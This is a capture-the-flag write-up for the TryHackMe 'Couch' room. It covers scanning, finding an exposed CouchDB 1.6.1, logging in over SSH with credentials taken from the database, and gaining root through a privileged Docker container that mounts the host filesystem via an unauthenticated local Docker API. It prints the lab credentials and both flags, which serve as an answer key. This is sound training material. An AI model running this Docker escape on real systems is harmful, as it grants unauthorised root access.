TryHackMe - Couch - Writeup

Couch

Hack into a vulnerable database server that collects and stores data in JSON-based document formats, in this semi-guided challenge.

Nmap Scanning

root@ip-10-10-125-194:~# rustscan -a 10.10.26.209 --range 1-10000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
\U0001f30dHACK THE PLANET\U0001f30d

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.26.209:22
Open 10.10.26.209:5984
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p  ")

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-30 19:22 UTC
Initiating Ping Scan at 19:22
Scanning 10.10.26.209 [2 ports]
Completed Ping Scan at 19:22, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:22
Completed Parallel DNS resolution of 1 host. at 19:22, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:22
Scanning ip-10-10-26-209.eu-west-1.compute.internal (10.10.26.209) [2 ports]
Discovered open port 22/tcp on 10.10.26.209
Discovered open port 5984/tcp on 10.10.26.209
Completed Connect Scan at 19:22, 0.00s elapsed (2 total ports)
Nmap scan report for ip-10-10-26-209.eu-west-1.compute.internal (10.10.26.209)
Host is up, received conn-refused (0.00055s latency).
Scanned at 2021-06-30 19:22:25 UTC for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
5984/tcp open  couchdb syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

Nmap scanning 2

root@ip-10-10-125-194:~# nmap -sCV -A -p5984 10.10.26.209 -T3

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-30 20:23 BST
Nmap scan report for ip-10-10-26-209.eu-west-1.compute.internal (10.10.26.209)
Host is up (0.00042s latency).

PORT     STATE SERVICE VERSION
5984/tcp open  http    CouchDB httpd 1.6.1 (Erlang OTP/18)
|_http-server-header: CouchDB/1.6.1 (Erlang OTP/18)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
MAC Address: 02:CE:03:61:C9:1D (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose|phone|webcam
Running (JUST GUESSING): Asus embedded (94%), Linux 3.X|4.X|2.6.X (94%), Google Android 5.X|6.X|7.X (92%)
OS CPE: cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel:3.16 cpe:/o:google:android:5.1 cpe:/o:google:android:6 cpe:/o:linux:linux_kernel:3.18 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.17
Aggressive OS guesses: ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.16 (94%), Linux 3.1 (93%), Linux 3.2 (93%), Android 5.1 (92%), Android 6.0-7.1.2 (Linux 3.18-4.4.1) (92%), Linux 3.13 (92%), Linux 3.2 - 3.10 (92%), Linux 3.2 - 3.16 (92%), Linux 3.2 - 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms ip-10-10-26-209.eu-west-1.compute.internal (10.10.26.209)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.08 seconds

[ Note: I am new at rustscan, I will learn more about it. ]

Task 1 Resy Set Go

Question: Scan the machine, how many ports are open?

Answer: 2

Question: What’s is the database management system installed on the server?

Answer: couchdb

Question: What port is the database management system running on?

Answer: 5984

Question: What’s is the version of management system installed on the server?

Answer: 1.6.1

Question: What is path for the web administration tool for this database management system?

Answer: _utils Stackoverflow Answer

Question: What is path for list all databases in the web browser of the database management system?

Answer: _all_dbs tutorialkart: Get Database List using REST API

Question: What is the credentials founed in the web administration tool?

Answer: atena:t4qfzcc4qN## Secret Database

root@ip-10-10-125-194:~# ssh atena@10.10.26.209
The authenticity of host '10.10.26.209 (10.10.26.209)' can't be established.
ECDSA key fingerprint is SHA256:TtfUUNS6Ivob4iQ7X414863lCCc1q2YyzzycIkRTZ3k.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.26.209' (ECDSA) to the list of known hosts.
atena@10.10.26.209's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-193-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Fri Dec 18 15:25:27 2020 from 192.168.85.1
atena@ubuntu:~$ 
atena@ubuntu:~$ ls
user.txt
atena@ubuntu:~$ cat user.txt
THM{1ns3cure_couchdb}
atena@ubuntu:~$

Login to the SSH server using the credential and

Question: Compromise the machine and locate user.txt

Answer: THM{1ns3cure_couchdb}

atena@ubuntu:/tmp$ netstat -antup
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:5984            0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:2375          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:40073         0.0.0.0:*               LISTEN      -               
tcp        0      0 10.10.136.71:22         10.10.250.123:48324     ESTABLISHED -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -

I saw that 127.0.0.1:2375 docker port running in the machine. From the hacktricks blog I found compromising type privilege escalation which will help to escape from a docker container.

atena@ubuntu:/tmp$ docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
/ # ls /mnt
bin             home            lib64           opt             sbin            usr
boot            initrd.img      lost+found      proc            srv             var
dev             initrd.img.old  media           root            sys             vmlinuz
etc             lib             mnt             run             tmp             vmlinuz.old
/ # ls /mnt/root/
root.txt
/ # cat /mnt/root/root.txt
THM{RCE_us1ng_Docker_API}
/ #

Question: Escalate privileges and obtain root.txt

Answer: THM{RCE_us1ng_Docker_API}

Room link: Couch

Written on July 2, 2021